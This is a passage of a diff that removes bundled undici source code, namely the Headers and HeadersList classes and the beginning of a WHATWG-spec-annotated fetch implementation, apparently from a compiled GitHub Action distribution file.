null - } - } - - // https://fetch.spec.whatwg.org/#header-list-contains - contains (name) { - // A header list list contains a header name name if list - // contains a header whose name is a byte-case-insensitive - // match for name. - name = name.toLowerCase() - - return this[kHeadersMap].has(name) - } - - clear () { - this[kHeadersMap].clear() - this[kHeadersSortedMap] = null - this.cookies = null - } - - // https://fetch.spec.whatwg.org/#concept-header-list-append - append (name, value) { - this[kHeadersSortedMap] = null - - // 1. 
If list contains name, then set name to the first such - // header’s name. - const lowercaseName = name.toLowerCase() - const exists = this[kHeadersMap].get(lowercaseName) - - // 2. Append (name, value) to list. - if (exists) { - const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' - this[kHeadersMap].set(lowercaseName, { - name: exists.name, - value: `${exists.value}${delimiter}${value}` - }) - } else { - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - if (lowercaseName === 'set-cookie') { - this.cookies ??= [] - this.cookies.push(value) - } - } - - // https://fetch.spec.whatwg.org/#concept-header-list-set - set (name, value) { - this[kHeadersSortedMap] = null - const lowercaseName = name.toLowerCase() - - if (lowercaseName === 'set-cookie') { - this.cookies = [value] - } - - // 1. If list contains name, then set the value of - // the first such header to value and remove the - // others. - // 2. Otherwise, append header (name, value) to list. - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-delete - delete (name) { - this[kHeadersSortedMap] = null - - name = name.toLowerCase() - - if (name === 'set-cookie') { - this.cookies = null - } - - this[kHeadersMap].delete(name) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-get - get (name) { - const value = this[kHeadersMap].get(name.toLowerCase()) - - // 1. If list does not contain name, then return null. - // 2. Return the values of all headers in list whose name - // is a byte-case-insensitive match for name, - // separated from each other by 0x2C 0x20, in order. - return value === undefined ? 
null : value.value - } - - * [Symbol.iterator] () { - // use the lowercased name - for (const [name, { value }] of this[kHeadersMap]) { - yield [name, value] - } - } - - get entries () { - const headers = {} - - if (this[kHeadersMap].size) { - for (const { name, value } of this[kHeadersMap].values()) { - headers[name] = value - } - } - - return headers - } -} - -// https://fetch.spec.whatwg.org/#headers-class -class Headers { - constructor (init = undefined) { - if (init === kConstruct) { - return - } - this[kHeadersList] = new HeadersList() - - // The new Headers(init) constructor steps are: - - // 1. Set this’s guard to "none". - this[kGuard] = 'none' - - // 2. If init is given, then fill this with init. - if (init !== undefined) { - init = webidl.converters.HeadersInit(init) - fill(this, init) - } - } - - // https://fetch.spec.whatwg.org/#dom-headers-append - append (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - return appendHeader(this, name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-delete - delete (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.delete', - value: name, - type: 'header name' - }) - } - - // 2. If this’s guard is "immutable", then throw a TypeError. - // 3. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 4. Otherwise, if this’s guard is "request-no-cors", name - // is not a no-CORS-safelisted request-header name, and - // name is not a privileged no-CORS request-header name, - // return. - // 5. 
Otherwise, if this’s guard is "response" and name is - // a forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 6. If this’s header list does not contain name, then - // return. - if (!this[kHeadersList].contains(name)) { - return - } - - // 7. Delete name from this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this. - this[kHeadersList].delete(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-get - get (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.get', - value: name, - type: 'header name' - }) - } - - // 2. Return the result of getting name from this’s header - // list. - return this[kHeadersList].get(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-has - has (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.has', - value: name, - type: 'header name' - }) - } - - // 2. Return true if this’s header list contains name; - // otherwise false. 
- return this[kHeadersList].contains(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-set - set (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.set' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value, - type: 'header value' - }) - } - - // 3. If this’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 5. Otherwise, if this’s guard is "request-no-cors" and - // name/value is not a no-CORS-safelisted request-header, - // return. - // 6. Otherwise, if this’s guard is "response" and name is a - // forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 7. Set (name, value) in this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this - this[kHeadersList].set(name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie - getSetCookie () { - webidl.brandCheck(this, Headers) - - // 1. If this’s header list does not contain `Set-Cookie`, then return « ». - // 2. Return the values of all headers in this’s header list whose name is - // a byte-case-insensitive match for `Set-Cookie`, in order. 
- - const list = this[kHeadersList].cookies - - if (list) { - return [...list] - } - - return [] - } - - // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine - get [kHeadersSortedMap] () { - if (this[kHeadersList][kHeadersSortedMap]) { - return this[kHeadersList][kHeadersSortedMap] - } - - // 1. Let headers be an empty list of headers with the key being the name - // and value the value. - const headers = [] - - // 2. Let names be the result of convert header names to a sorted-lowercase - // set with all the names of the headers in list. - const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) - const cookies = this[kHeadersList].cookies - - // 3. For each name of names: - for (let i = 0; i < names.length; ++i) { - const [name, value] = names[i] - // 1. If name is `set-cookie`, then: - if (name === 'set-cookie') { - // 1. Let values be a list of all values of headers in list whose name - // is a byte-case-insensitive match for name, in order. - - // 2. For each value of values: - // 1. Append (name, value) to headers. - for (let j = 0; j < cookies.length; ++j) { - headers.push([name, cookies[j]]) - } - } else { - // 2. Otherwise: - - // 1. Let value be the result of getting name from list. - - // 2. Assert: value is non-null. - assert(value !== null) - - // 3. Append (name, value) to headers. - headers.push([name, value]) - } - } - - this[kHeadersList][kHeadersSortedMap] = headers - - // 4. Return headers. 
- return headers - } - - keys () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key' - ) - } - - values () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'value' - ) - } - - entries () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key+value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key+value' - ) - } - - /** - * @param {(value: string, key: string, self: Headers) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." 
- ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } - - [Symbol.for('nodejs.util.inspect.custom')] () { - webidl.brandCheck(this, Headers) - - return this[kHeadersList] - } -} - -Headers.prototype[Symbol.iterator] = Headers.prototype.entries - -Object.defineProperties(Headers.prototype, { - append: kEnumerableProperty, - delete: kEnumerableProperty, - get: kEnumerableProperty, - has: kEnumerableProperty, - set: kEnumerableProperty, - getSetCookie: kEnumerableProperty, - keys: kEnumerableProperty, - values: kEnumerableProperty, - entries: kEnumerableProperty, - forEach: kEnumerableProperty, - [Symbol.iterator]: { enumerable: false }, - [Symbol.toStringTag]: { - value: 'Headers', - configurable: true - } -}) - -webidl.converters.HeadersInit = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (V[Symbol.iterator]) { - return webidl.converters['sequence>'](V) - } - - return webidl.converters['record'](V) - } - - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) -} - -module.exports = { - fill, - Headers, - HeadersList -} - - -/***/ }), - -/***/ 4881: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { - Response, - makeNetworkError, - makeAppropriateNetworkError, - filterResponse, - makeResponse -} = __nccwpck_require__(7823) -const { Headers } = __nccwpck_require__(554) -const { Request, makeRequest } = __nccwpck_require__(8359) -const zlib = __nccwpck_require__(9796) -const { - bytesMatch, - makePolicyContainer, - clonePolicyContainer, - requestBadPort, - TAOCheck, - appendRequestOriginHeader, - responseLocationURL, - requestCurrentURL, - setRequestReferrerPolicyOnRedirect, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - createOpaqueTimingInfo, - appendFetchMetadata, - corsCheck, - crossOriginResourcePolicyCheck, - 
determineRequestsReferrer, - coarsenedSharedCurrentTime, - createDeferredPromise, - isBlobLike, - sameOrigin, - isCancelled, - isAborted, - isErrorLike, - fullyReadBody, - readableStreamClose, - isomorphicEncode, - urlIsLocal, - urlIsHttpHttpsScheme, - urlHasHttpsScheme -} = __nccwpck_require__(2538) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const assert = __nccwpck_require__(9491) -const { safelyExtractBody } = __nccwpck_require__(1472) -const { - redirectStatusSet, - nullBodyStatus, - safeMethodsSet, - requestBodyHeader, - subresourceSet, - DOMException -} = __nccwpck_require__(1037) -const { kHeadersList } = __nccwpck_require__(2785) -const EE = __nccwpck_require__(2361) -const { Readable, pipeline } = __nccwpck_require__(2781) -const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) -const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) -const { TransformStream } = __nccwpck_require__(5356) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { webidl } = __nccwpck_require__(1744) -const { STATUS_CODES } = __nccwpck_require__(3685) -const GET_OR_HEAD = ['GET', 'HEAD'] - -/** @type {import('buffer').resolveObjectURL} */ -let resolveObjectURL -let ReadableStream = globalThis.ReadableStream - -class Fetch extends EE { - constructor (dispatcher) { - super() - - this.dispatcher = dispatcher - this.connection = null - this.dump = false - this.state = 'ongoing' - // 2 terminated listeners get added per request, - // but only 1 gets removed. If there are 20 redirects, - // 21 listeners will be added. - // See https://github.com/nodejs/undici/issues/1711 - // TODO (fix): Find and fix root cause for leaked listener. 
- this.setMaxListeners(21) - } - - terminate (reason) { - if (this.state !== 'ongoing') { - return - } - - this.state = 'terminated' - this.connection?.destroy(reason) - this.emit('terminated', reason) - } - - // https://fetch.spec.whatwg.org/#fetch-controller-abort - abort (error) { - if (this.state !== 'ongoing') { - return - } - - // 1. Set controller’s state to "aborted". - this.state = 'aborted' - - // 2. Let fallbackError be an "AbortError" DOMException. - // 3. Set error to fallbackError if it is not given. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 4. Let serializedError be StructuredSerialize(error). - // If that threw an exception, catch it, and let - // serializedError be StructuredSerialize(fallbackError). - - // 5. Set controller’s serialized abort reason to serializedError. - this.serializedAbortReason = error - - this.connection?.destroy(error) - this.emit('terminated', error) - } -} - -// https://fetch.spec.whatwg.org/#fetch-method -function fetch (input, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) - - // 1. Let p be a new promise. - const p = createDeferredPromise() - - // 2. Let requestObject be the result of invoking the initial value of - // Request as constructor with input and init as arguments. If this throws - // an exception, reject p with it and return p. - let requestObject - - try { - requestObject = new Request(input, init) - } catch (e) { - p.reject(e) - return p.promise - } - - // 3. Let request be requestObject’s request. - const request = requestObject[kState] - - // 4. If requestObject’s signal’s aborted flag is set, then: - if (requestObject.signal.aborted) { - // 1. Abort the fetch() call with p, request, null, and - // requestObject’s signal’s abort reason. - abortFetch(p, request, null, requestObject.signal.reason) - - // 2. Return p. - return p.promise - } - - // 5. Let globalObject be request’s client’s global object. 
- const globalObject = request.client.globalObject - - // 6. If globalObject is a ServiceWorkerGlobalScope object, then set - // request’s service-workers mode to "none". - if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { - request.serviceWorkers = 'none' - } - - // 7. Let responseObject be null. - let responseObject = null - - // 8. Let relevantRealm be this’s relevant Realm. - const relevantRealm = null - - // 9. Let locallyAborted be false. - let locallyAborted = false - - // 10. Let controller be null. - let controller = null - - // 11. Add the following abort steps to requestObject’s signal: - addAbortListener( - requestObject.signal, - () => { - // 1. Set locallyAborted to true. - locallyAborted = true - - // 2. Assert: controller is non-null. - assert(controller != null) - - // 3. Abort controller with requestObject’s signal’s abort reason. - controller.abort(requestObject.signal.reason) - - // 4. Abort the fetch() call with p, request, responseObject, - // and requestObject’s signal’s abort reason. - abortFetch(p, request, responseObject, requestObject.signal.reason) - } - ) - - // 12. Let handleFetchDone given response response be to finalize and - // report timing with response, globalObject, and "fetch". - const handleFetchDone = (response) => - finalizeAndReportTiming(response, 'fetch') - - // 13. Set controller to the result of calling fetch given request, - // with processResponseEndOfBody set to handleFetchDone, and processResponse - // given response being these substeps: - - const processResponse = (response) => { - // 1. If locallyAborted is true, terminate these substeps. - if (locallyAborted) { - return Promise.resolve() - } - - // 2. If response’s aborted flag is set, then: - if (response.aborted) { - // 1. Let deserializedError be the result of deserialize a serialized - // abort reason given controller’s serialized abort reason and - // relevantRealm. - - // 2. 
Abort the fetch() call with p, request, responseObject, and - // deserializedError. - - abortFetch(p, request, responseObject, controller.serializedAbortReason) - return Promise.resolve() - } - - // 3. If response is a network error, then reject p with a TypeError - // and terminate these substeps. - if (response.type === 'error') { - p.reject( - Object.assign(new TypeError('fetch failed'), { cause: response.error }) - ) - return Promise.resolve() - } - - // 4. Set responseObject to the result of creating a Response object, - // given response, "immutable", and relevantRealm. - responseObject = new Response() - responseObject[kState] = response - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Resolve p with responseObject. - p.resolve(responseObject) - } - - controller = fetching({ - request, - processResponseEndOfBody: handleFetchDone, - processResponse, - dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici - }) - - // 14. Return p. - return p.promise -} - -// https://fetch.spec.whatwg.org/#finalize-and-report-timing -function finalizeAndReportTiming (response, initiatorType = 'other') { - // 1. If response is an aborted network error, then return. - if (response.type === 'error' && response.aborted) { - return - } - - // 2. If response’s URL list is null or empty, then return. - if (!response.urlList?.length) { - return - } - - // 3. Let originalURL be response’s URL list[0]. - const originalURL = response.urlList[0] - - // 4. Let timingInfo be response’s timing info. - let timingInfo = response.timingInfo - - // 5. Let cacheState be response’s cache state. - let cacheState = response.cacheState - - // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. - if (!urlIsHttpHttpsScheme(originalURL)) { - return - } - - // 7. If timingInfo is null, then return. 
- if (timingInfo === null) { - return - } - - // 8. If response’s timing allow passed flag is not set, then: - if (!response.timingAllowPassed) { - // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. - timingInfo = createOpaqueTimingInfo({ - startTime: timingInfo.startTime - }) - - // 2. Set cacheState to the empty string. - cacheState = '' - } - - // 9. Set timingInfo’s end time to the coarsened shared current time - // given global’s relevant settings object’s cross-origin isolated - // capability. - // TODO: given global’s relevant settings object’s cross-origin isolated - // capability? - timingInfo.endTime = coarsenedSharedCurrentTime() - - // 10. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 11. Mark resource timing for timingInfo, originalURL, initiatorType, - // global, and cacheState. - markResourceTiming( - timingInfo, - originalURL, - initiatorType, - globalThis, - cacheState - ) -} - -// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing -function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { - if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { - performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) - } -} - -// https://fetch.spec.whatwg.org/#abort-fetch -function abortFetch (p, request, responseObject, error) { - // Note: AbortSignal.reason was added in node v17.2.0 - // which would give us an undefined error to reject with. - // Remove this once node v16 is no longer supported. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 1. Reject promise with error. - p.reject(error) - - // 2. If request’s body is not null and is readable, then cancel request’s - // body with error. 
- if (request.body != null && isReadable(request.body?.stream)) { - request.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } - - // 3. If responseObject is null, then return. - if (responseObject == null) { - return - } - - // 4. Let response be responseObject’s response. - const response = responseObject[kState] - - // 5. If response’s body is not null and is readable, then error response’s - // body with error. - if (response.body != null && isReadable(response.body?.stream)) { - response.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } -} - -// https://fetch.spec.whatwg.org/#fetching -function fetching ({ - request, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseEndOfBody, - processResponseConsumeBody, - useParallelQueue = false, - dispatcher // undici -}) { - // 1. Let taskDestination be null. - let taskDestination = null - - // 2. Let crossOriginIsolatedCapability be false. - let crossOriginIsolatedCapability = false - - // 3. If request’s client is non-null, then: - if (request.client != null) { - // 1. Set taskDestination to request’s client’s global object. - taskDestination = request.client.globalObject - - // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin - // isolated capability. - crossOriginIsolatedCapability = - request.client.crossOriginIsolatedCapability - } - - // 4. If useParallelQueue is true, then set taskDestination to the result of - // starting a new parallel queue. - // TODO - - // 5. Let timingInfo be a new fetch timing info whose start time and - // post-redirect start time are the coarsened shared current time given - // crossOriginIsolatedCapability. 
- const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) - const timingInfo = createOpaqueTimingInfo({ - startTime: currenTime - }) - - // 6. Let fetchParams be a new fetch params whose - // request is request, - // timing info is timingInfo, - // process request body chunk length is processRequestBodyChunkLength, - // process request end-of-body is processRequestEndOfBody, - // process response is processResponse, - // process response consume body is processResponseConsumeBody, - // process response end-of-body is processResponseEndOfBody, - // task destination is taskDestination, - // and cross-origin isolated capability is crossOriginIsolatedCapability. - const fetchParams = { - controller: new Fetch(dispatcher), - request, - timingInfo, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseConsumeBody, - processResponseEndOfBody, - taskDestination, - crossOriginIsolatedCapability - } - - // 7. If request’s body is a byte sequence, then set request’s body to - // request’s body as a body. - // NOTE: Since fetching is only called from fetch, body should already be - // extracted. - assert(!request.body || request.body.stream) - - // 8. If request’s window is "client", then set request’s window to request’s - // client, if request’s client’s global object is a Window object; otherwise - // "no-window". - if (request.window === 'client') { - // TODO: What if request.client is null? - request.window = - request.client?.globalObject?.constructor?.name === 'Window' - ? request.client - : 'no-window' - } - - // 9. If request’s origin is "client", then set request’s origin to request’s - // client’s origin. - if (request.origin === 'client') { - // TODO: What if request.client is null? - request.origin = request.client?.origin - } - - // 10. If all of the following conditions are true: - // TODO - - // 11. 
If request’s policy container is "client", then: - if (request.policyContainer === 'client') { - // 1. If request’s client is non-null, then set request’s policy - // container to a clone of request’s client’s policy container. [HTML] - if (request.client != null) { - request.policyContainer = clonePolicyContainer( - request.client.policyContainer - ) - } else { - // 2. Otherwise, set request’s policy container to a new policy - // container. - request.policyContainer = makePolicyContainer() - } - } - - // 12. If request’s header list does not contain `Accept`, then: - if (!request.headersList.contains('accept')) { - // 1. Let value be `*/*`. - const value = '*/*' - - // 2. A user agent should set value to the first matching statement, if - // any, switching on request’s destination: - // "document" - // "frame" - // "iframe" - // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` - // "image" - // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` - // "style" - // `text/css,*/*;q=0.1` - // TODO - - // 3. Append `Accept`/value to request’s header list. - request.headersList.append('accept', value) - } - - // 13. If request’s header list does not contain `Accept-Language`, then - // user agents should append `Accept-Language`/an appropriate value to - // request’s header list. - if (!request.headersList.contains('accept-language')) { - request.headersList.append('accept-language', '*') - } - - // 14. If request’s priority is null, then use request’s initiator and - // destination appropriately in setting request’s priority to a - // user-agent-defined object. - if (request.priority === null) { - // TODO - } - - // 15. If request is a subresource request, then: - if (subresourceSet.has(request.destination)) { - // TODO - } - - // 16. Run main fetch given fetchParams. - mainFetch(fetchParams) - .catch(err => { - fetchParams.controller.terminate(err) - }) - - // 17. 
Return fetchParam's controller - return fetchParams.controller -} - -// https://fetch.spec.whatwg.org/#concept-main-fetch -async function mainFetch (fetchParams, recursive = false) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. If request’s local-URLs-only flag is set and request’s current URL is - // not local, then set response to a network error. - if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { - response = makeNetworkError('local URLs only') - } - - // 4. Run report Content Security Policy violations for request. - // TODO - - // 5. Upgrade request to a potentially trustworthy URL, if appropriate. - tryUpgradeRequestToAPotentiallyTrustworthyURL(request) - - // 6. If should request be blocked due to a bad port, should fetching request - // be blocked as mixed content, or should request be blocked by Content - // Security Policy returns blocked, then set response to a network error. - if (requestBadPort(request) === 'blocked') { - response = makeNetworkError('bad port') - } - // TODO: should fetching request be blocked as mixed content? - // TODO: should request be blocked by Content Security Policy? - - // 7. If request’s referrer policy is the empty string, then set request’s - // referrer policy to request’s policy container’s referrer policy. - if (request.referrerPolicy === '') { - request.referrerPolicy = request.policyContainer.referrerPolicy - } - - // 8. If request’s referrer is not "no-referrer", then set request’s - // referrer to the result of invoking determine request’s referrer. - if (request.referrer !== 'no-referrer') { - request.referrer = determineRequestsReferrer(request) - } - - // 9. 
Set request’s current URL’s scheme to "https" if all of the following - // conditions are true: - // - request’s current URL’s scheme is "http" - // - request’s current URL’s host is a domain - // - Matching request’s current URL’s host per Known HSTS Host Domain Name - // Matching results in either a superdomain match with an asserted - // includeSubDomains directive or a congruent match (with or without an - // asserted includeSubDomains directive). [HSTS] - // TODO - - // 10. If recursive is false, then run the remaining steps in parallel. - // TODO - - // 11. If response is null, then set response to the result of running - // the steps corresponding to the first matching statement: - if (response === null) { - response = await (async () => { - const currentURL = requestCurrentURL(request) - - if ( - // - request’s current URL’s origin is same origin with request’s origin, - // and request’s response tainting is "basic" - (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || - // request’s current URL’s scheme is "data" - (currentURL.protocol === 'data:') || - // - request’s mode is "navigate" or "websocket" - (request.mode === 'navigate' || request.mode === 'websocket') - ) { - // 1. Set request’s response tainting to "basic". - request.responseTainting = 'basic' - - // 2. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s mode is "same-origin" - if (request.mode === 'same-origin') { - // 1. Return a network error. - return makeNetworkError('request mode cannot be "same-origin"') - } - - // request’s mode is "no-cors" - if (request.mode === 'no-cors') { - // 1. If request’s redirect mode is not "follow", then return a network - // error. - if (request.redirect !== 'follow') { - return makeNetworkError( - 'redirect mode cannot be "follow" for "no-cors" request' - ) - } - - // 2. Set request’s response tainting to "opaque". 
- request.responseTainting = 'opaque' - - // 3. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s current URL’s scheme is not an HTTP(S) scheme - if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { - // Return a network error. - return makeNetworkError('URL scheme must be a HTTP(S) scheme') - } - - // - request’s use-CORS-preflight flag is set - // - request’s unsafe-request flag is set and either request’s method is - // not a CORS-safelisted method or CORS-unsafe request-header names with - // request’s header list is not empty - // 1. Set request’s response tainting to "cors". - // 2. Let corsWithPreflightResponse be the result of running HTTP fetch - // given fetchParams and true. - // 3. If corsWithPreflightResponse is a network error, then clear cache - // entries using request. - // 4. Return corsWithPreflightResponse. - // TODO - - // Otherwise - // 1. Set request’s response tainting to "cors". - request.responseTainting = 'cors' - - // 2. Return the result of running HTTP fetch given fetchParams. - return await httpFetch(fetchParams) - })() - } - - // 12. If recursive is true, then return response. - if (recursive) { - return response - } - - // 13. If response is not a network error and response is not a filtered - // response, then: - if (response.status !== 0 && !response.internalResponse) { - // If request’s response tainting is "cors", then: - if (request.responseTainting === 'cors') { - // 1. Let headerNames be the result of extracting header list values - // given `Access-Control-Expose-Headers` and response’s header list. - // TODO - // 2. If request’s credentials mode is not "include" and headerNames - // contains `*`, then set response’s CORS-exposed header-name list to - // all unique header names in response’s header list. - // TODO - // 3. Otherwise, if headerNames is not null or failure, then set - // response’s CORS-exposed header-name list to headerNames. 
- // TODO - } - - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (request.responseTainting === 'basic') { - response = filterResponse(response, 'basic') - } else if (request.responseTainting === 'cors') { - response = filterResponse(response, 'cors') - } else if (request.responseTainting === 'opaque') { - response = filterResponse(response, 'opaque') - } else { - assert(false) - } - } - - // 14. Let internalResponse be response, if response is a network error, - // and response’s internal response otherwise. - let internalResponse = - response.status === 0 ? response : response.internalResponse - - // 15. If internalResponse’s URL list is empty, then set it to a clone of - // request’s URL list. - if (internalResponse.urlList.length === 0) { - internalResponse.urlList.push(...request.urlList) - } - - // 16. If request’s timing allow failed flag is unset, then set - // internalResponse’s timing allow passed flag. - if (!request.timingAllowFailed) { - response.timingAllowPassed = true - } - - // 17. If response is not a network error and any of the following returns - // blocked - // - should internalResponse to request be blocked as mixed content - // - should internalResponse to request be blocked by Content Security Policy - // - should internalResponse to request be blocked due to its MIME type - // - should internalResponse to request be blocked due to nosniff - // TODO - - // 18. If response’s type is "opaque", internalResponse’s status is 206, - // internalResponse’s range-requested flag is set, and request’s header - // list does not contain `Range`, then set response and internalResponse - // to a network error. - if ( - response.type === 'opaque' && - internalResponse.status === 206 && - internalResponse.rangeRequested && - !request.headers.contains('range') - ) { - response = internalResponse = makeNetworkError() - } - - // 19. 
If response is not a network error and either request’s method is - // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, - // set internalResponse’s body to null and disregard any enqueuing toward - // it (if any). - if ( - response.status !== 0 && - (request.method === 'HEAD' || - request.method === 'CONNECT' || - nullBodyStatus.includes(internalResponse.status)) - ) { - internalResponse.body = null - fetchParams.controller.dump = true - } - - // 20. If request’s integrity metadata is not the empty string, then: - if (request.integrity) { - // 1. Let processBodyError be this step: run fetch finale given fetchParams - // and a network error. - const processBodyError = (reason) => - fetchFinale(fetchParams, makeNetworkError(reason)) - - // 2. If request’s response tainting is "opaque", or response’s body is null, - // then run processBodyError and abort these steps. - if (request.responseTainting === 'opaque' || response.body == null) { - processBodyError(response.error) - return - } - - // 3. Let processBody given bytes be these steps: - const processBody = (bytes) => { - // 1. If bytes do not match request’s integrity metadata, - // then run processBodyError and abort these steps. [SRI] - if (!bytesMatch(bytes, request.integrity)) { - processBodyError('integrity mismatch') - return - } - - // 2. Set response’s body to bytes as a body. - response.body = safelyExtractBody(bytes)[0] - - // 3. Run fetch finale given fetchParams and response. - fetchFinale(fetchParams, response) - } - - // 4. Fully read response’s body given processBody and processBodyError. - await fullyReadBody(response.body, processBody, processBodyError) - } else { - // 21. Otherwise, run fetch finale given fetchParams and response. 
- fetchFinale(fetchParams, response) - } -} - -// https://fetch.spec.whatwg.org/#concept-scheme-fetch -// given a fetch params fetchParams -function schemeFetch (fetchParams) { - // Note: since the connection is destroyed on redirect, which sets fetchParams to a - // cancelled state, we do not want this condition to trigger *unless* there have been - // no redirects. See https://github.com/nodejs/undici/issues/1776 - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { - return Promise.resolve(makeAppropriateNetworkError(fetchParams)) - } - - // 2. Let request be fetchParams’s request. - const { request } = fetchParams - - const { protocol: scheme } = requestCurrentURL(request) - - // 3. Switch on request’s current URL’s scheme and run the associated steps: - switch (scheme) { - case 'about:': { - // If request’s current URL’s path is the string "blank", then return a new response - // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », - // and body is the empty byte sequence as a body. - - // Otherwise, return a network error. - return 